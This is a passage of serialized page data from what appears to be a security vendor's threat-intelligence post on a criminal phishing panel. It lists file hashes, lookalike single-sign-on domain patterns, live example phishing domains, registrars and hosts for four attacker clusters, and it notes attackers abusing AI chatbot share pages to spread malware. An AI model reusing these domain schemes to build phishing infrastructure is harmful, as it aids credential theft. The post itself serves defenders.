patterns.",[],{},{"nodeType":605,"data":3921,"content":3922},{},[3923],{"nodeType":241,"value":3924,"marks":3925,"data":3926},"Cluster A",[],{},{"nodeType":237,"data":3928,"content":3929},{},[3930,3934,3943],{"nodeType":241,"value":3931,"marks":3932,"data":3933},"The indicators for Cluster A overlap with ",[],{},{"nodeType":260,"data":3935,"content":3937},{"uri":3936},"https://cloud.google.com/blog/topics/threat-intelligence/expansion-shinyhunters-saas-data-theft",[3938],{"nodeType":241,"value":3939,"marks":3940,"data":3942},"Mandiant’s reporting on UNC6661",[3941],{"type":573},{},{"nodeType":241,"value":3944,"marks":3945,"data":3946},". Mandiant also attributes the extortion activity following UNC6661 intrusions to UNC6240, aka ShinyHunters.",[],{},{"nodeType":917,"data":3948,"content":3949},{},[3950,3974,4003,4026,4077,4121,4144,4167],{"nodeType":921,"data":3951,"content":3952},{},[3953,3964],{"nodeType":951,"data":3954,"content":3955},{},[3956],{"nodeType":237,"data":3957,"content":3958},{},[3959],{"nodeType":241,"value":3960,"marks":3961,"data":3963},"Tool",[3962],{"type":313},{},{"nodeType":951,"data":3965,"content":3966},{},[3967],{"nodeType":237,"data":3968,"content":3969},{},[3970],{"nodeType":241,"value":3456,"marks":3971,"data":3973},[3972],{"type":313},{},{"nodeType":921,"data":3975,"content":3976},{},[3977,3986],{"nodeType":951,"data":3978,"content":3979},{},[3980],{"nodeType":237,"data":3981,"content":3982},{},[3983],{"nodeType":241,"value":3484,"marks":3984,"data":3985},[],{},{"nodeType":951,"data":3987,"content":3988},{},[3989,3996],{"nodeType":237,"data":3990,"content":3991},{},[3992],{"nodeType":241,"value":3993,"marks":3994,"data":3995},"8a01bcb70ec1c101a163c9cb8e074781c1322096f7ae01789f02252854def44c",[],{},{"nodeType":237,"data":3997,"content":3998},{},[3999],{"nodeType":241,"value":4000,"marks":4001,"data":4002},"f574b6e6b3a968cda5f51bec2c090d8eb095fbcfc383314f94bc15676a0d6692",[],{},{"nodeType":921,"data":4004,"content":4005},{},[4006,4016],{"nodeType":951,"data":4007,"content":4008},{},[4009],{"nodeType":237,"data":4010,"content":4011},{},[4012],{"nodeType":241,"value":4013,"marks":4014,"data":4015},"Timeframe",[],{},{"nodeType":951,"data":4017,"content":4018},{},[4019],{"nodeType":237,"data":4020,"content":4021},{},[4022],{"nodeType":241,"value":4023,"marks":4024,"data":4025},"November 2025 - present (April 2026)",[],{},{"nodeType":921,"data":4027,"content":4028},{},[4029,4039],{"nodeType":951,"data":4030,"content":4031},{},[4032],{"nodeType":237,"data":4033,"content":4034},{},[4035],{"nodeType":241,"value":4036,"marks":4037,"data":4038},"Domain Patterns",[],{},{"nodeType":951,"data":4040,"content":4041},{},[4042,4049,4056,4063,4070],{"nodeType":237,"data":4043,"content":4044},{},[4045],{"nodeType":241,"value":4046,"marks":4047,"data":4048},"\u003Ctarget>internal.com\n\u003Ctarget>sso.com",[],{},{"nodeType":237,"data":4050,"content":4051},{},[4052],{"nodeType":241,"value":4053,"marks":4054,"data":4055},"my\u003Ctarget>.com",[],{},{"nodeType":237,"data":4057,"content":4058},{},[4059],{"nodeType":241,"value":4060,"marks":4061,"data":4062},"my\u003Ctarget>internal.com",[],{},{"nodeType":237,"data":4064,"content":4065},{},[4066],{"nodeType":241,"value":4067,"marks":4068,"data":4069},"my\u003Ctarget>manager.com",[],{},{"nodeType":237,"data":4071,"content":4072},{},[4073],{"nodeType":241,"value":4074,"marks":4075,"data":4076},"my\u003Ctarget>sso.com",[],{},{"nodeType":921,"data":4078,"content":4079},{},[4080,4090],{"nodeType":951,"data":4081,"content":4082},{},[4083],{"nodeType":237,"data":4084,"content":4085},{},[4086],{"nodeType":241,"value":4087,"marks":4088,"data":4089},"Examples",[],{},{"nodeType":951,"data":4091,"content":4092},{},[4093,4100,4107,4114],{"nodeType":237,"data":4094,"content":4095},{},[4096],{"nodeType":241,"value":4097,"marks":4098,"data":4099},"mydropboxinternal.com (November 2025)",[],{},{"nodeType":237,"data":4101,"content":4102},{},[4103],{"nodeType":241,"value":4104,"marks":4105,"data":4106},"myxerointernal.com (December 2025)",[],{},{"nodeType":237,"data":4108,"content":4109},{},[4110],{"nodeType":241,"value":4111,"marks":4112,"data":4113},"amazoninternal.com (March 2026)",[],{},{"nodeType":237,"data":4115,"content":4116},{},[4117],{"nodeType":241,"value":4118,"marks":4119,"data":4120},"mydisneysso.com (March 2026)",[],{},{"nodeType":921,"data":4122,"content":4123},{},[4124,4134],{"nodeType":951,"data":4125,"content":4126},{},[4127],{"nodeType":237,"data":4128,"content":4129},{},[4130],{"nodeType":241,"value":4131,"marks":4132,"data":4133},"Registrar",[],{},{"nodeType":951,"data":4135,"content":4136},{},[4137],{"nodeType":237,"data":4138,"content":4139},{},[4140],{"nodeType":241,"value":4141,"marks":4142,"data":4143},"NiceNIC",[],{},{"nodeType":921,"data":4145,"content":4146},{},[4147,4157],{"nodeType":951,"data":4148,"content":4149},{},[4150],{"nodeType":237,"data":4151,"content":4152},{},[4153],{"nodeType":241,"value":4154,"marks":4155,"data":4156},"Name Servers",[],{},{"nodeType":951,"data":4158,"content":4159},{},[4160],{"nodeType":237,"data":4161,"content":4162},{},[4163],{"nodeType":241,"value":4164,"marks":4165,"data":4166},"1984.is FreeDNS",[],{},{"nodeType":921,"data":4168,"content":4169},{},[4170,4180],{"nodeType":951,"data":4171,"content":4172},{},[4173],{"nodeType":237,"data":4174,"content":4175},{},[4176],{"nodeType":241,"value":4177,"marks":4178,"data":4179},"Hosting Provider",[],{},{"nodeType":951,"data":4181,"content":4182},{},[4183],{"nodeType":237,"data":4184,"content":4185},{},[4186],{"nodeType":241,"value":4187,"marks":4188,"data":4189},"Mevspace (AS201814)",[],{},{"nodeType":605,"data":4191,"content":4192},{},[4193],{"nodeType":241,"value":4194,"marks":4195,"data":4196},"Cluster B",[],{},{"nodeType":237,"data":4198,"content":4199},{},[4200,4204,4212,4216,4225],{"nodeType":241,"value":4201,"marks":4202,"data":4203},"The indicators for Cluster B overlap with ",[],{},{"nodeType":260,"data":4205,"content":4206},{"uri":3936},[4207],{"nodeType":241,"value":4208,"marks":4209,"data":4211},"Mandiant’s reporting on UNC6671",[4210],{"type":573},{},{"nodeType":241,"value":4213,"marks":4214,"data":4215},". ",[],{},{"nodeType":260,"data":4217,"content":4219},{"uri":4218},"https://rhisac.org/threat-intelligence/extortion-in-the-enterprise-defending-against-blackfile-attacks/",[4220],{"nodeType":241,"value":4221,"marks":4222,"data":4224},"Other external reporting",[4223],{"type":573},{},{"nodeType":241,"value":4226,"marks":4227,"data":4228}," has linked this group to BlackFile-branded extortion and leaks.",[],{},{"nodeType":917,"data":4230,"content":4231},{},[4232,4255,4298,4320,4355,4398,4420,4442],{"nodeType":921,"data":4233,"content":4234},{},[4235,4245],{"nodeType":951,"data":4236,"content":4237},{},[4238],{"nodeType":237,"data":4239,"content":4240},{},[4241],{"nodeType":241,"value":3960,"marks":4242,"data":4244},[4243],{"type":313},{},{"nodeType":951,"data":4246,"content":4247},{},[4248],{"nodeType":237,"data":4249,"content":4250},{},[4251],{"nodeType":241,"value":3582,"marks":4252,"data":4254},[4253],{"type":313},{},{"nodeType":921,"data":4256,"content":4257},{},[4258,4267],{"nodeType":951,"data":4259,"content":4260},{},[4261],{"nodeType":237,"data":4262,"content":4263},{},[4264],{"nodeType":241,"value":3484,"marks":4265,"data":4266},[],{},{"nodeType":951,"data":4268,"content":4269},{},[4270,4277,4284,4291],{"nodeType":237,"data":4271,"content":4272},{},[4273],{"nodeType":241,"value":4274,"marks":4275,"data":4276},"c0df36ccf88d5c8434b13b58f7a55a9715643a126148b9d078a93075d09cad26",[],{},{"nodeType":237,"data":4278,"content":4279},{},[4280],{"nodeType":241,"value":4281,"marks":4282,"data":4283},"d178dc7108fa9344dae28e350e810352e9e874563496dc7876ee628b11b0eabb",[],{},{"nodeType":237,"data":4285,"content":4286},{},[4287],{"nodeType":241,"value":4288,"marks":4289,"data":4290},"9c0939960e49122196e44b6779fe55dd7a13ab437ce251c8cf35f8c6daf8be21",[],{},{"nodeType":237,"data":4292,"content":4293},{},[4294],{"nodeType":241,"value":4295,"marks":4296,"data":4297},"e8128b33259f7ea4313c942689ba0ba557f17b1474f2e621c62a5b77674fab86",[],{},{"nodeType":921,"data":4299,"content":4300},{},[4301,4310],{"nodeType":951,"data":4302,"content":4303},{},[4304],{"nodeType":237,"data":4305,"content":4306},{},[4307],{"nodeType":241,"value":4013,"marks":4308,"data":4309},[],{},{"nodeType":951,"data":4311,"content":4312},{},[4313],{"nodeType":237,"data":4314,"content":4315},{},[4316],{"nodeType":241,"value":4317,"marks":4318,"data":4319},"January 2026",[],{},{"nodeType":921,"data":4321,"content":4322},{},[4323,4332],{"nodeType":951,"data":4324,"content":4325},{},[4326],{"nodeType":237,"data":4327,"content":4328},{},[4329],{"nodeType":241,"value":4036,"marks":4330,"data":4331},[],{},{"nodeType":951,"data":4333,"content":4334},{},[4335,4342,4349],{"nodeType":237,"data":4336,"content":4337},{},[4338],{"nodeType":241,"value":4339,"marks":4340,"data":4341},"\u003Ctarget>internal.com",[],{},{"nodeType":237,"data":4343,"content":4344},{},[4345],{"nodeType":241,"value":4346,"marks":4347,"data":4348},"\u003Ctarget>sso.com",[],{},{"nodeType":237,"data":4350,"content":4351},{},[4352],{"nodeType":241,"value":4074,"marks":4353,"data":4354},[],{},{"nodeType":921,"data":4356,"content":4357},{},[4358,4367],{"nodeType":951,"data":4359,"content":4360},{},[4361],{"nodeType":237,"data":4362,"content":4363},{},[4364],{"nodeType":241,"value":4087,"marks":4365,"data":4366},[],{},{"nodeType":951,"data":4368,"content":4369},{},[4370,4377,4384,4391],{"nodeType":237,"data":4371,"content":4372},{},[4373],{"nodeType":241,"value":4374,"marks":4375,"data":4376},"epicgamessso[.]com (December 2025)",[],{},{"nodeType":237,"data":4378,"content":4379},{},[4380],{"nodeType":241,"value":4381,"marks":4382,"data":4383},"myadyeninternal[.]com (January 2026)",[],{},{"nodeType":237,"data":4385,"content":4386},{},[4387],{"nodeType":241,"value":4388,"marks":4389,"data":4390},"mysonossso[.]com (January 2026)",[],{},{"nodeType":237,"data":4392,"content":4393},{},[4394],{"nodeType":241,"value":4395,"marks":4396,"data":4397},"sonosinternal[.]com (January 2026)",[],{},{"nodeType":921,"data":4399,"content":4400},{},[4401,4410],{"nodeType":951,"data":4402,"content":4403},{},[4404],{"nodeType":237,"data":4405,"content":4406},{},[4407],{"nodeType":241,"value":4131,"marks":4408,"data":4409},[],{},{"nodeType":951,"data":4411,"content":4412},{},[4413],{"nodeType":237,"data":4414,"content":4415},{},[4416],{"nodeType":241,"value":4417,"marks":4418,"data":4419},"Tucows",[],{},{"nodeType":921,"data":4421,"content":4422},{},[4423,4432],{"nodeType":951,"data":4424,"content":4425},{},[4426],{"nodeType":237,"data":4427,"content":4428},{},[4429],{"nodeType":241,"value":4154,"marks":4430,"data":4431},[],{},{"nodeType":951,"data":4433,"content":4434},{},[4435],{"nodeType":237,"data":4436,"content":4437},{},[4438],{"nodeType":241,"value":4439,"marks":4440,"data":4441},"Njalla",[],{},{"nodeType":921,"data":4443,"content":4444},{},[4445,4454],{"nodeType":951,"data":4446,"content":4447},{},[4448],{"nodeType":237,"data":4449,"content":4450},{},[4451],{"nodeType":241,"value":4177,"marks":4452,"data":4453},[],{},{"nodeType":951,"data":4455,"content":4456},{},[4457],{"nodeType":237,"data":4458,"content":4459},{},[4460],{"nodeType":241,"value":4461,"marks":4462,"data":4463},"Njalla (AS39287)",[],{},{"nodeType":605,"data":4465,"content":4466},{},[4467],{"nodeType":241,"value":4468,"marks":4469,"data":4470},"Cluster C",[],{},{"nodeType":237,"data":4472,"content":4473},{},[4474],{"nodeType":241,"value":4475,"marks":4476,"data":4477},"Cluster C is likely an evolution of Cluster B. Some evidence has been observed tying the backend hosting to Njalla behind the Cloudflare CDN further solidifying the link. The shift to Cloudflare Turnstile protection and subdomain-based targeting represents an operational refinement — moving away from the distinctive [target]internal[.]com pattern that had become a well-known campaign indicator.",[],{},{"nodeType":917,"data":4479,"content":4480},{},[4481,4505,4527,4549,4571,4614,4635,4657],{"nodeType":921,"data":4482,"content":4483},{},[4484,4494],{"nodeType":951,"data":4485,"content":4486},{},[4487],{"nodeType":237,"data":4488,"content":4489},{},[4490],{"nodeType":241,"value":3960,"marks":4491,"data":4493},[4492],{"type":313},{},{"nodeType":951,"data":4495,"content":4496},{},[4497],{"nodeType":237,"data":4498,"content":4499},{},[4500],{"nodeType":241,"value":4501,"marks":4502,"data":4504},"heartbeat/check_redirect variant protected with Cloudflare turnstile",[4503],{"type":313},{},{"nodeType":921,"data":4506,"content":4507},{},[4508,4517],{"nodeType":951,"data":4509,"content":4510},{},[4511],{"nodeType":237,"data":4512,"content":4513},{},[4514],{"nodeType":241,"value":3484,"marks":4515,"data":4516},[],{},{"nodeType":951,"data":4518,"content":4519},{},[4520],{"nodeType":237,"data":4521,"content":4522},{},[4523],{"nodeType":241,"value":4524,"marks":4525,"data":4526},"cb1d409278b2247af23e7b00ac779b232baaf4ce5f63fdf5ebc3920a38cc6102",[],{},{"nodeType":921,"data":4528,"content":4529},{},[4530,4539],{"nodeType":951,"data":4531,"content":4532},{},[4533],{"nodeType":237,"data":4534,"content":4535},{},[4536],{"nodeType":241,"value":4013,"marks":4537,"data":4538},[],{},{"nodeType":951,"data":4540,"content":4541},{},[4542],{"nodeType":237,"data":4543,"content":4544},{},[4545],{"nodeType":241,"value":4546,"marks":4547,"data":4548},"March 2026 - present (April 2026)",[],{},{"nodeType":921,"data":4550,"content":4551},{},[4552,4561],{"nodeType":951,"data":4553,"content":4554},{},[4555],{"nodeType":237,"data":4556,"content":4557},{},[4558],{"nodeType":241,"value":4036,"marks":4559,"data":4560},[],{},{"nodeType":951,"data":4562,"content":4563},{},[4564],{"nodeType":237,"data":4565,"content":4566},{},[4567],{"nodeType":241,"value":4568,"marks":4569,"data":4570},"\u003Ctarget> subdomain with generic “sso”, “passkey”, “enroll”, “okta” theme root domain",[],{},{"nodeType":921,"data":4572,"content":4573},{},[4574,4583],{"nodeType":951,"data":4575,"content":4576},{},[4577],{"nodeType":237,"data":4578,"content":4579},{},[4580],{"nodeType":241,"value":4087,"marks":4581,"data":4582},[],{},{"nodeType":951,"data":4584,"content":4585},{},[4586,4593,4600,4607],{"nodeType":237,"data":4587,"content":4588},{},[4589],{"nodeType":241,"value":4590,"marks":4591,"data":4592},"\u003Ctarget>.passkeysetup.com (March 2026)",[],{},{"nodeType":237,"data":4594,"content":4595},{},[4596],{"nodeType":241,"value":4597,"marks":4598,"data":4599},"\u003Ctarget>.enrollms.com (March 2026)",[],{},{"nodeType":237,"data":4601,"content":4602},{},[4603],{"nodeType":241,"value":4604,"marks":4605,"data":4606},"\u003Ctarget>.keyokta.com (April 2026)",[],{},{"nodeType":237,"data":4608,"content":4609},{},[4610],{"nodeType":241,"value":4611,"marks":4612,"data":4613},"\u003Ctarget>.passkeywork.com (April 2026)",[],{},{"nodeType":921,"data":4615,"content":4616},{},[4617,4626],{"nodeType":951,"data":4618,"content":4619},{},[4620],{"nodeType":237,"data":4621,"content":4622},{},[4623],{"nodeType":241,"value":4131,"marks":4624,"data":4625},[],{},{"nodeType":951,"data":4627,"content":4628},{},[4629],{"nodeType":237,"data":4630,"content":4631},{},[4632],{"nodeType":241,"value":4417,"marks":4633,"data":4634},[],{},{"nodeType":921,"data":4636,"content":4637},{},[4638,4647],{"nodeType":951,"data":4639,"content":4640},{},[4641],{"nodeType":237,"data":4642,"content":4643},{},[4644],{"nodeType":241,"value":4154,"marks":4645,"data":4646},[],{},{"nodeType":951,"data":4648,"content":4649},{},[4650],{"nodeType":237,"data":4651,"content":4652},{},[4653],{"nodeType":241,"value":4654,"marks":4655,"data":4656},"Cloudflare",[],{},{"nodeType":921,"data":4658,"content":4659},{},[4660,4669],{"nodeType":951,"data":4661,"content":4662},{},[4663],{"nodeType":237,"data":4664,"content":4665},{},[4666],{"nodeType":241,"value":4177,"marks":4667,"data":4668},[],{},{"nodeType":951,"data":4670,"content":4671},{},[4672],{"nodeType":237,"data":4673,"content":4674},{},[4675],{"nodeType":241,"value":4676,"marks":4677,"data":4678},"Cloudflare (AS13335)",[],{},{"nodeType":605,"data":4680,"content":4681},{},[4682],{"nodeType":241,"value":4683,"marks":4684,"data":4685},"Cluster D",[],{},{"nodeType":917,"data":4687,"content":4688},{},[4689,4713,4735,4757,4779,4808,4829,4850],{"nodeType":921,"data":4690,"content":4691},{},[4692,4702],{"nodeType":951,"data":4693,"content":4694},{},[4695],{"nodeType":237,"data":4696,"content":4697},{},[4698],{"nodeType":241,"value":3960,"marks":4699,"data":4701},[4700],{"type":313},{},{"nodeType":951,"data":4703,"content":4704},{},[4705],{"nodeType":237,"data":4706,"content":4707},{},[4708],{"nodeType":241,"value":4709,"marks":4710,"data":4712},"heartbeat/check_redirect variant (minified)",[4711],{"type":313},{},{"nodeType":921,"data":4714,"content":4715},{},[4716,4725],{"nodeType":951,"data":4717,"content":4718},{},[4719],{"nodeType":237,"data":4720,"content":4721},{},[4722],{"nodeType":241,"value":3484,"marks":4723,"data":4724},[],{},{"nodeType":951,"data":4726,"content":4727},{},[4728],{"nodeType":237,"data":4729,"content":4730},{},[4731],{"nodeType":241,"value":4732,"marks":4733,"data":4734},"9d65dd34384b441505e6b67647153c02d5c367bb53da36ce36a392e70b37940a",[],{},{"nodeType":921,"data":4736,"content":4737},{},[4738,4747],{"nodeType":951,"data":4739,"content":4740},{},[4741],{"nodeType":237,"data":4742,"content":4743},{},[4744],{"nodeType":241,"value":4013,"marks":4745,"data":4746},[],{},{"nodeType":951,"data":4748,"content":4749},{},[4750],{"nodeType":237,"data":4751,"content":4752},{},[4753],{"nodeType":241,"value":4754,"marks":4755,"data":4756},"April 2026 (low volume)",[],{},{"nodeType":921,"data":4758,"content":4759},{},[4760,4769],{"nodeType":951,"data":4761,"content":4762},{},[4763],{"nodeType":237,"data":4764,"content":4765},{},[4766],{"nodeType":241,"value":4036,"marks":4767,"data":4768},[],{},{"nodeType":951,"data":4770,"content":4771},{},[4772],{"nodeType":237,"data":4773,"content":4774},{},[4775],{"nodeType":241,"value":4776,"marks":4777,"data":4778},"\u003Ctarget> subdomain with generic “passkey”, “portal”, “okta” theme root domain",[],{},{"nodeType":921,"data":4780,"content":4781},{},[4782,4791],{"nodeType":951,"data":4783,"content":4784},{},[4785],{"nodeType":237,"data":4786,"content":4787},{},[4788],{"nodeType":241,"value":4087,"marks":4789,"data":4790},[],{},{"nodeType":951,"data":4792,"content":4793},{},[4794,4801],{"nodeType":237,"data":4795,"content":4796},{},[4797],{"nodeType":241,"value":4798,"marks":4799,"data":4800},"\u003Ctarget>.passkeyportalsetup.com",[],{},{"nodeType":237,"data":4802,"content":4803},{},[4804],{"nodeType":241,"value":4805,"marks":4806,"data":4807},"\u003Ctarget>.addoktapasskey.com",[],{},{"nodeType":921,"data":4809,"content":4810},{},[4811,4820],{"nodeType":951,"data":4812,"content":4813},{},[4814],{"nodeType":237,"data":4815,"content":4816},{},[4817],{"nodeType":241,"value":4131,"marks":4818,"data":4819},[],{},{"nodeType":951,"data":4821,"content":4822},{},[4823],{"nodeType":237,"data":4824,"content":4825},{},[4826],{"nodeType":241,"value":4141,"marks":4827,"data":4828},[],{},{"nodeType":921,"data":4830,"content":4831},{},[4832,4841],{"nodeType":951,"data":4833,"content":4834},{},[4835],{"nodeType":237,"data":4836,"content":4837},{},[4838],{"nodeType":241,"value":4154,"marks":4839,"data":4840},[],{},{"nodeType":951,"data":4842,"content":4843},{},[4844],{"nodeType":237,"data":4845,"content":4846},{},[4847],{"nodeType":241,"value":4654,"marks":4848,"data":4849},[],{},{"nodeType":921,"data":4851,"content":4852},{},[4853,4862],{"nodeType":951,"data":4854,"content":4855},{},[4856],{"nodeType":237,"data":4857,"content":4858},{},[4859],{"nodeType":241,"value":4177,"marks":4860,"data":4861},[],{},{"nodeType":951,"data":4863,"content":4864},{},[4865],{"nodeType":237,"data":4866,"content":4867},{},[4868],{"nodeType":241,"value":4676,"marks":4869,"data":4870},[],{},{"nodeType":320,"data":4872,"content":4873},{},[],{"nodeType":324,"data":4875,"content":4876},{},[4877],{"nodeType":241,"value":4878,"marks":4879,"data":4881},"Detection considerations",[4880],{"type":313},{},{"nodeType":237,"data":4883,"content":4884},{},[4885],{"nodeType":241,"value":4886,"marks":4887,"data":4888},"For Push, the detection approach to these panels is fundamentally the same as for any other phishing kit — behavioral analysis of the rendered page in the browser, regardless of the C2 protocol running underneath. ",[],{},{"nodeType":237,"data":4890,"content":4891},{},[4892],{"nodeType":241,"value":4893,"marks":4894,"data":4895},"The main operational difference is on the operator end, where the human-in-the-loop interaction replaces fully automated credential harvesting. This has implications for defenders relying on proactive infrastructure scanning: the gated landing pages, anti-bot checks, and operator-approval requirements mean the malicious content is only served to active targets, making it significantly harder for automated scanners to discover and flag these domains before they're used against a victim.",[],{},{"nodeType":237,"data":4897,"content":4898},{},[4899,4904],{"nodeType":241,"value":4900,"marks":4901,"data":4903},"The phone call as delivery vector eliminates the email-based detection surface that most organizations rely on as their primary phishing defense. ",[4902],{"type":313},{},{"nodeType":241,"value":4905,"marks":4906,"data":4907},"Operator-gated payload delivery further reduces the likelihood that these sites will be flagged as malicious and added to known-bad detection lists (and in any case, it’s trivial for attackers to spin up new ones). This reinforces the need for browser-based detection at the point the user interacts with the page, analyzing it in real time for malicious content without relying on static IoCs. ",[],{},{"nodeType":320,"data":4909,"content":4910},{},[],{"nodeType":324,"data":4912,"content":4913},{},[4914],{"nodeType":241,"value":886,"marks":4915,"data":4917},[4916],{"type":313},{},{"nodeType":237,"data":4919,"content":4920},{},[4921,4925,4931],{"nodeType":241,"value":4922,"marks":4923,"data":4924},"Short-lived IoCs are of limited value when tackling modern phishing attacks due to the rate at which attackers are able to ",[],{},{"nodeType":260,"data":4926,"content":4927},{"uri":899},[4928],{"nodeType":241,"value":902,"marks":4929,"data":4930},[],{},{"nodeType":241,"value":4932,"marks":4933,"data":4934}," in the attack chain, often dynamically serving different URLs to site visitors. ",[],{},{"nodeType":237,"data":4936,"content":4937},{},[4938,4941,4949],{"nodeType":241,"value":29,"marks":4939,"data":4940},[],{},{"nodeType":260,"data":4942,"content":4944},{"uri":4943},"https://www.virustotal.com/gui/collection/0f745e9da6ef7664444594a7ee930cfe5a9d8bd6c2f039dcde818599b8926610",[4945],{"nodeType":241,"value":4946,"marks":4947,"data":4948},"The full list of IoCs is on VirusTotal here. ",[],{},{"nodeType":241,"value":29,"marks":4950,"data":4951},[],{},{"nodeType":237,"data":4953,"content":4954},{},[4955],{"nodeType":241,"value":841,"marks":4956,"data":4958},[4957],{"type":313},{},{"nodeType":320,"data":4960,"content":4961},{},[],{"nodeType":324,"data":4963,"content":4964},{},[4965],{"nodeType":241,"value":4966,"marks":4967,"data":4969},"Learn more about Push",[4968],{"type":313},{},{"nodeType":237,"data":4971,"content":4972},{},[4973,4977,4984],{"nodeType":241,"value":4974,"marks":4975,"data":4976},"Push Security is the most powerful AI-native security tool in the browser. Think EDR, but for the browser — high-fidelity telemetry and real-time control across every session, on every device, with no browser migration required.\n\nSecurity teams use Push to detect and stop advanced browser-based attacks like AiTM phishing, ClickFix, and session hijacking; gain visibility and control over AI tool usage across their workforce; harden identities by surfacing credential reuse, SSO gaps, and shadow IT; and support data loss and insider investigations with browser-layer telemetry that other tools can't see.\n\nBook a ",[],{},{"nodeType":260,"data":4978,"content":4979},{"uri":2023},[4980],{"nodeType":241,"value":4981,"marks":4982,"data":4983},"live demo",[],{},{"nodeType":241,"value":2032,"marks":4985,"data":4986},[],{},"We infiltrated a criminal phishing panel: here’s what we found","We got an inside look at a phishing panel used in criminal campaigns linked to operators like ShinyHunters and BlackFile. Here’s what we found.","inside-criminal-phishing-panel",{"items":4991},[4992,4994],{"sys":4993,"name":2041},{"id":2040},{"sys":4995,"name":2045},{"id":2044},{"items":4997},[4998],{"fullName":4999,"firstName":5000,"jobTitle":2051,"profilePicture":5001},"Push Security Research Team","Research",{"url":5002},"https://images.ctfassets.net/y1cdw1ablpvd/7LpkwyXbOZ8WCVTAXzULmC/bfa3634c78ee9dfbee6606ba5519918b/push-round.png","llmshare-malvertising-campaign","blog/llmshare-malvertising-campaign",{"json":5006},{"data":5007,"content":5008,"nodeType":233},{},[5009],{"data":5010,"content":5011,"nodeType":237},{},[5012],{"data":5013,"marks":5014,"value":5015,"nodeType":241},{},[],"Attackers are abusing the shared content features of AI chatbot platforms — ChatGPT and Claude — to deliver malware through pages hosted on legitimate, trusted domains, distributing the malicious links via sponsored malvertising ads on search engines. ","How attackers are using shared content features on AI chatbot platforms to deliver malware via pages hosted on legitimate domains, sent via malvertising.",{"id":5018,"publishedAt":5019},"Gcg7PGuICrlRcqq1QFXxH","2026-05-29T12:35:20.950Z",{"items":5021},[5022,5024],{"sys":5023,"name":2041},{"id":2040},{"sys":5025,"name":2045},{"id":2044},"khEBPnrZWZ6HhFHnS9uksY9HY5NPHXhNH6Akdim7Dxc",1780064627794]